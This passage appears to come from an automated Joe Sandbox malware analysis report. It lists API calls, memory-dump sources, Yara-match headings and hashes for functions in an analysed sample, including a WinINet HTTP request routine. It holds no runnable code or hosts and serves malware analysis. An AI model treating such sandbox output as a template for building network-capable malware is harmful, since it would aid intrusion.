                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00426B2F
                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00426B61
                    • List.LIBCONCRT ref: 00426B9C
                    • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00426BAD
                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00426BC9
                    • List.LIBCONCRT ref: 00426C04
                    • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00426C15
                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426C30
                    • List.LIBCONCRT ref: 00426C6B
                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426C78
                      • Part of subcall function 00425FEF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426007
                      • Part of subcall function 00425FEF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426019
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                    • String ID:
                    • API String ID: 3403738998-0
                    • Opcode ID: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
                    • Instruction ID: 37c50e48faffa15a5835890cc86fa27e9627dd6e10cbd905bce2715576e74200
                    • Opcode Fuzzy Hash: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
                    • Instruction Fuzzy Hash: 86517071B00229ABDB04DF55D595BEEB7B8FF08304F4140AAE9459B381DB38AE44CB94
                    APIs
                    • _free.LIBCMT ref: 044FA876
                      • Part of subcall function 044FB0FC: HeapFree.KERNEL32(00000000,00000000,?,044FF3D7,?,00000000,?,?,?,044FF3FE,?,00000007,?,?,044FF800,?), ref: 044FB112
                      • Part of subcall function 044FB0FC: GetLastError.KERNEL32(?,?,044FF3D7,?,00000000,?,?,?,044FF3FE,?,00000007,?,?,044FF800,?,?), ref: 044FB124
                    • _free.LIBCMT ref: 044FA882
                    • _free.LIBCMT ref: 044FA88D
                    • _free.LIBCMT ref: 044FA898
                    • _free.LIBCMT ref: 044FA8A3
                    • _free.LIBCMT ref: 044FA8AE
                    • _free.LIBCMT ref: 044FA8B9
                    • _free.LIBCMT ref: 044FA8C4
                    • _free.LIBCMT ref: 044FA8CF
                    • _free.LIBCMT ref: 044FA8DD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: faf1fab25e7e5356c3667d34395fc000b7ed69faf9a38d3f10eaeaa8788c76cd
                    • Instruction ID: 8496a25e7dc5c30d1fd9ca2af2a32419cce2ada4776ae8663ea3a11652eacd4b
                    • Opcode Fuzzy Hash: faf1fab25e7e5356c3667d34395fc000b7ed69faf9a38d3f10eaeaa8788c76cd
                    • Instruction Fuzzy Hash: D321A976904148FFDF11EF9ADC41DDE7BB8EF08244B00816AAB159B521DB31FA448B84
                    APIs
                    • _free.LIBCMT ref: 0043A60F
                      • Part of subcall function 0043AE95: HeapFree.KERNEL32(00000000,00000000,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?), ref: 0043AEAB
                      • Part of subcall function 0043AE95: GetLastError.KERNEL32(?,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?,?), ref: 0043AEBD
                    • _free.LIBCMT ref: 0043A61B
                    • _free.LIBCMT ref: 0043A626
                    • _free.LIBCMT ref: 0043A631
                    • _free.LIBCMT ref: 0043A63C
                    • _free.LIBCMT ref: 0043A647
                    • _free.LIBCMT ref: 0043A652
                    • _free.LIBCMT ref: 0043A65D
                    • _free.LIBCMT ref: 0043A668
                    • _free.LIBCMT ref: 0043A676
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: faf1fab25e7e5356c3667d34395fc000b7ed69faf9a38d3f10eaeaa8788c76cd
                    • Instruction ID: dafaea9898a024bbeaf4eb5fa5a9bd5eb26c9af27a77b3f713287ac740e7ce33
                    • Opcode Fuzzy Hash: faf1fab25e7e5356c3667d34395fc000b7ed69faf9a38d3f10eaeaa8788c76cd
                    • Instruction Fuzzy Hash: 5721EA76980208BFCB02EF95C882CDE7BB9BF08344F00556AF5559F121DB39EA58CB95
                    APIs
                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,00447CAF), ref: 00445B3B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: DecodePointer
                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                    • API String ID: 3527080286-3064271455
                    • Opcode ID: dea9b2b477d79067893bb5005812e2be1a4e6301d490f468fa664dc5d61788b9
                    • Instruction ID: 82c09db9cbec65f831423c8afe244374c316664d9e9191f84e2616e9823b9814
                    • Opcode Fuzzy Hash: dea9b2b477d79067893bb5005812e2be1a4e6301d490f468fa664dc5d61788b9
                    • Instruction Fuzzy Hash: 57518C70804E0ADBEF109F99E88C5AEBFB0FF05315F108157D981A6356CB788A19DF59
                    APIs
                    • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 004274C0
                    • SwitchToThread.KERNEL32(?), ref: 004274E3
                    • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00427502
                    • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 0042751E
                    • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00427529
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00427550
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementSwitchThreadstd::invalid_argument::invalid_argument
                    • String ID: count$ppVirtualProcessorRoots
                    • API String ID: 3791123369-3650809737
                    • Opcode ID: 18d1e6f5588df1a187ef86af0e02b332a0a908ae4d907c5c7b9a669127731062
                    • Instruction ID: fc4521544dbb6807429d0765a6944cf8e671c5b6cf8d6aaa99cb8baaa305a527
                    • Opcode Fuzzy Hash: 18d1e6f5588df1a187ef86af0e02b332a0a908ae4d907c5c7b9a669127731062
                    • Instruction Fuzzy Hash: B6218734B00325AFCB00EF55D595AAEBBB5BF05315F9040AAE901A7352DB38AE45CB58
                    APIs
                    • GetCurrentProcess.KERNEL32 ref: 00426F46
                    • GetCurrentProcess.KERNEL32 ref: 00426F4E
                    • DuplicateHandle.KERNEL32(00000000,000000FF,00000000,00000000,00000000,00000000,00000002), ref: 00426F63
                    • SafeRWList.LIBCONCRT ref: 00426F83
                      • Part of subcall function 00424F7E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00424F8F
                      • Part of subcall function 00424F7E: List.LIBCMT ref: 00424F99
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00426F95
                    • GetLastError.KERNEL32 ref: 00426FA4
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00426FBA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorHandleLastLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
                    • String ID: eventObject
                    • API String ID: 165577817-1680012138
                    • Opcode ID: f60108b339336b36486ca6d42982c1fe9e2fd9d4e50230e8ef23f6bb8518d1a3
                    • Instruction ID: df3dab38d58adcbe0854f5ec81775a9d2d7f31f209f9ace54438c2a0d187fe5a
                    • Opcode Fuzzy Hash: f60108b339336b36486ca6d42982c1fe9e2fd9d4e50230e8ef23f6bb8518d1a3
                    • Instruction Fuzzy Hash: 7B110A75600215E7CB14EFA4ED49FEE33686F04301F614067F505E61D2DB389A04C66D
                    APIs
                    • InternetOpenW.WININET(00458DD8,00000000,00000000,00000000,00000000), ref: 0040BE8C
                    • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0040BEB0
                    • HttpOpenRequestA.WININET(?,00000000), ref: 0040BEFA
                    • HttpSendRequestA.WININET(?,00000000), ref: 0040BFBA
                    • InternetReadFile.WININET(?,?,000003FF,?), ref: 0040C06C
                    • InternetReadFile.WININET(?,00000000,000003FF,?), ref: 0040C120
                    • InternetCloseHandle.WININET(?), ref: 0040C147
                    • InternetCloseHandle.WININET(?), ref: 0040C14F
                    • InternetCloseHandle.WININET(?), ref: 0040C157
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
                    • String ID:
                    • API String ID: 1354133546-0
                    • Opcode ID: f92a2c5220199609d232bb9906de1fae6d9fd6eb88148f3a830a07d45c2ba553
                    • Instruction ID: fc00d707cc8310124706744b4272bec9d664429c83f1612504789ecaecb1249d
                    • Opcode Fuzzy Hash: f92a2c5220199609d232bb9906de1fae6d9fd6eb88148f3a830a07d45c2ba553
                    • Instruction Fuzzy Hash: DCC1E4B1A10118DBDB24CF28CD8879D7B75EF45304F5082AAF508A72D2D7799AC0CF99
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dc6c705b50a0233cd7e36e16e7ee03d109a599ae8ac8f0e8377d12fdc1036c5f
                    • Instruction ID: 0f55982fb79583f58f14797ec5a46e556381a19464cc4602ab3c2c71f3a51322
                    • Opcode Fuzzy Hash: dc6c705b50a0233cd7e36e16e7ee03d109a599ae8ac8f0e8377d12fdc1036c5f
                    • Instruction Fuzzy Hash: 0DC1B078A0424DBFDF25DF99E884BAD7BB0BF49304F04806AE501A72D2E774A941DF61
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dc6c705b50a0233cd7e36e16e7ee03d109a599ae8ac8f0e8377d12fdc1036c5f
                    • Instruction ID: 0c802ae4ab2a979f088469e657098b65825bdc8a12ea5f1622e0d451203c6042
                    • Opcode Fuzzy Hash: dc6c705b50a0233cd7e36e16e7ee03d109a599ae8ac8f0e8377d12fdc1036c5f
                    • Instruction Fuzzy Hash: 50C125B0E08B499FEF15DF99C881BAE7BB0AF49314F04415BE541AB383D7789901CB69
                    APIs
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042EB8A
                      • Part of subcall function 0042903F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00429060
                    • Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 0042EBA3
                    • Concurrency::location::_Assign.LIBCMT ref: 0042EBB9
                    • Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 0042EC26
                    • Concurrency::details::SchedulerBase::ClearQuickCacheSlot.LIBCMT ref: 0042EC2E
                    • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0042EC55
                    • Concurrency::details::VirtualProcessor::EnsureAllTasksVisible.LIBCONCRT ref: 0042EC61
                    • Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0042ECB8
                    • Concurrency::details::ReferenceCountedQuickBitSet::InterlockedClear.LIBCONCRT ref: 0042ECED
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Context$Base::$Processor::QuickVirtual$ClearCountedEventInterlockedReferenceSet::$AssignAvailableBlockedCacheConcurrency::location::_DeactivateEnsureInternalMakeSchedulerSlotSpinTasksThrowTraceUntilVisible
                    • String ID:
                    • API String ID: 1448206229-0
                    • Opcode ID: ef6b637e53bcacfd24deb09407c1cfd2e164961ead3192c811162a2ec9799835
                    • Instruction ID: e01a8d965dbd6924ae1385ea6739976de0ac7696f396b6a9ae4fb0b6a6b071f8
                    • Opcode Fuzzy Hash: ef6b637e53bcacfd24deb09407c1cfd2e164961ead3192c811162a2ec9799835
                    • Instruction Fuzzy Hash: 8051B4347002249FCB04EF66D4C5BAD77A5BF49314F9500AAED069B387CB78AC01CB6A
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
                    • String ID:
                    • API String ID: 3943753294-0
                    • Opcode ID: 614b4e817c589673b728cf08dcfac44524a47e1cde47449f47a12751e0a585f6
                    • Instruction ID: 4ebe81ca8b8bf856aede185294c0683c2f0d17b7c88aef19b0dd7a7181c0c963
                    • Opcode Fuzzy Hash: 614b4e817c589673b728cf08dcfac44524a47e1cde47449f47a12751e0a585f6
                    • Instruction Fuzzy Hash: 0C516E35A00605DFDF20DF64C5E496EB7B4BF08315B2444AAE8069B266DB30FD41CF95
                    APIs
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 044E7C7A
                      • Part of subcall function 044E602F: __EH_prolog3_catch.LIBCMT ref: 044E6036
                      • Part of subcall function 044E602F: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 044E606F
                    • Concurrency::details::SchedulerBase::NotifyThrottledContext.LIBCONCRT ref: 044E7C88
                      • Part of subcall function 044E6C94: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 044E6CB9
                      • Part of subcall function 044E6C94: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 044E6CDC
                    • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 044E7CA1
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 044E7CAD
                      • Part of subcall function 044E602F: RtlInterlockedPopEntrySList.NTDLL(?), ref: 044E60B8
                      • Part of subcall function 044E602F: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 044E60E7
                      • Part of subcall function 044E602F: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 044E60F5
                    • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 044E7CF9
                    • Concurrency::location::_Assign.LIBCMT ref: 044E7D1A
                    • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 044E7D22
                    • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 044E7D34
                    • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 044E7D64
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::$Scheduler$Context$Throttling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_EntryExerciseFoundH_prolog3_catchInterlockedListNextNotifyProcessor::RingSchedulingSpinStartupThrottledTicket::TimerUntilWith
                    • String ID:
                    • API String ID: 2678502038-0
                    • Opcode ID: 986a594d9c30ab416ef091d46fd7938cd3bae2acf70dbac93e6a4814106b4e22
                    • Instruction ID: b71b573db6d630c730369512d1466c9b96c826f8b2f230a19d593c37b7233cd2
                    • Opcode Fuzzy Hash: 986a594d9c30ab416ef091d46fd7938cd3bae2acf70dbac93e6a4814106b4e22
                    • Instruction Fuzzy Hash: BE31E630B002556BEF15AABB4491BFEBBB95F4172AF0444AFC841D7342DA25B906C791
                    APIs
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00427A13
                      • Part of subcall function 00425DC8: __EH_prolog3_catch.LIBCMT ref: 00425DCF
                      • Part of subcall function 00425DC8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00425E08
                    • Concurrency::details::SchedulerBase::NotifyThrottledContext.LIBCONCRT ref: 00427A21
                      • Part of subcall function 00426A2D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00426A52
                      • Part of subcall function 00426A2D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00426A75
                    • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00427A3A
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00427A46
                      • Part of subcall function 00425DC8: InterlockedPopEntrySList.KERNEL32(?), ref: 00425E51
                      • Part of subcall function 00425DC8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00425E80
                      • Part of subcall function 00425DC8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00425E8E
                    • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00427A92
                    • Concurrency::location::_Assign.LIBCMT ref: 00427AB3
                    • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 00427ABB
                    • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00427ACD
                    • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 00427AFD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::$Scheduler$Context$Throttling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_EntryExerciseFoundH_prolog3_catchInterlockedListNextNotifyProcessor::RingSchedulingSpinStartupThrottledTicket::TimerUntilWith
                    • String ID:
                    • API String ID: 2678502038-0
                    • Opcode ID: 986a594d9c30ab416ef091d46fd7938cd3bae2acf70dbac93e6a4814106b4e22
                    • Instruction ID: b103386965f6d4094a94b484948c95d99d8643f9033d24ccfe4d2b4bf8a20aa7
                    • Opcode Fuzzy Hash: 986a594d9c30ab416ef091d46fd7938cd3bae2acf70dbac93e6a4814106b4e22
                    • Instruction Fuzzy Hash: 5A312430B082716ACF16AA7864927FF7BB59F41318F4400ABD442D7382DB2D5E0AC399
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 044F0D13
                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,044E6025,?), ref: 044F0D25
                    • GetCurrentThread.KERNEL32 ref: 044F0D2D
                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,044E6025,?), ref: 044F0D35
                    • DuplicateHandle.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000002,?,?,?,?,?,?,044E6025,?), ref: 044F0D4E
                    • Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 044F0D6F
                      • Part of subcall function 044E0588: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 044E05A2
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,044E6025,?), ref: 044F0D81
                    • GetLastError.KERNEL32(?,?,?,?,?,044E6025,?), ref: 044F0DAC
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 044F0DC2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThread$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateHandleReferenceRegisterWait
                    • String ID:
                    • API String ID: 1293880212-0
                    • Opcode ID: 27d45d66322aed29ea19bd5ec75dcc7690659cc507f7251597d06f9f1e142a7c
                    • Instruction ID: e0e84582f4bd87a64dafdc611055fc9f471e63b4c77bf4100d0e2e89aa9361db
                    • Opcode Fuzzy Hash: 27d45d66322aed29ea19bd5ec75dcc7690659cc507f7251597d06f9f1e142a7c
                    • Instruction Fuzzy Hash: E711D275600301ABEF20AF75AD49FAB3BA8AF55742F180076FE45DA253EA74E4008776
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 00430AAC
                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00425DBE,?), ref: 00430ABE
                    • GetCurrentThread.KERNEL32 ref: 00430AC6
                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00425DBE,?), ref: 00430ACE
                    • DuplicateHandle.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000002,?,?,?,?,?,?,00425DBE,?), ref: 00430AE7
                    • Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 00430B08
                      • Part of subcall function 00420321: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 0042033B
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00425DBE,?), ref: 00430B1A
                    • GetLastError.KERNEL32(?,?,?,?,?,00425DBE,?), ref: 00430B45
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00430B5B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThread$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateHandleReferenceRegisterWait
                    • String ID:
                    • API String ID: 1293880212-0
                    • Opcode ID: 27d45d66322aed29ea19bd5ec75dcc7690659cc507f7251597d06f9f1e142a7c
                    • Instruction ID: d0b6aa9362e501fbcad66dfed5f34ccefc820da40d4b047d48024504de478199
                    • Opcode Fuzzy Hash: 27d45d66322aed29ea19bd5ec75dcc7690659cc507f7251597d06f9f1e142a7c
                    • Instruction Fuzzy Hash: E8113A75600301ABC710AFB5AD5AF9F77A89F09705F140176F949D6253EA78E800C779
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$InformationTimeZone
                    • String ID: XgE$XgE
                    • API String ID: 597776487-1765908331
                    • Opcode ID: 89a3ed0fc6f89cc58b21fccc7c1ecc1ecdd4453b6b678c45aaa3cc4d543d4e8b
                    • Instruction ID: 522c6a4b94f70f02e3c27a389033a88cb7bcdce65cfff907558a73f97f10e483
                    • Opcode Fuzzy Hash: 89a3ed0fc6f89cc58b21fccc7c1ecc1ecdd4453b6b678c45aaa3cc4d543d4e8b
                    • Instruction Fuzzy Hash: 15C16B39A00205AFDB24AF69EC496AA7BA8FF45314F14C4EAF980D72D1E730BD45E750
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 57cbbdc4d76c45f7c06843ec8fb8a05910e3ebdf20c7d86d4a35d6ab44b9dd1a
                    • Instruction ID: 6fb02bbac4bb258c8369858bb11bea59005a8a2d047618ded7074d01c381b789
                    • Opcode Fuzzy Hash: 57cbbdc4d76c45f7c06843ec8fb8a05910e3ebdf20c7d86d4a35d6ab44b9dd1a
                    • Instruction Fuzzy Hash: E1F1C370900218AFEF24DF54CD88BEEBBB9EB44304F5045AEE509A72C1DB75AA84CF55
                    APIs
                    • _ValidateLocalCookies.LIBCMT ref: 00434987
                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0043498F
                    • _ValidateLocalCookies.LIBCMT ref: 00434A18
                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00434A43
                    • _ValidateLocalCookies.LIBCMT ref: 00434A98
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                    • String ID: a:C$csm
                    • API String ID: 1170836740-2000533275
                    • Opcode ID: c6c3331f81419484f54866b6098c9c5dc2b5b23843a964c224861fa595cd409c
                    • Instruction ID: 2ac7ba5ff52def4039f4e408c399c9b7849d7006bd45f8f6dc393843d2f98b86
                    • Opcode Fuzzy Hash: c6c3331f81419484f54866b6098c9c5dc2b5b23843a964c224861fa595cd409c
                    • Instruction Fuzzy Hash: D4410A34A00209ABCF10EF69C845ADF7BB4FF89318F14815BE9156B352D779EA01CB99
                    APIs
                    • _SpinWait.LIBCONCRT ref: 0041EFCC
                    • Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 0041EFD8
                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0041EFF1
                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0041F01F
                    • Concurrency::Context::Block.LIBCONCRT ref: 0041F041
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
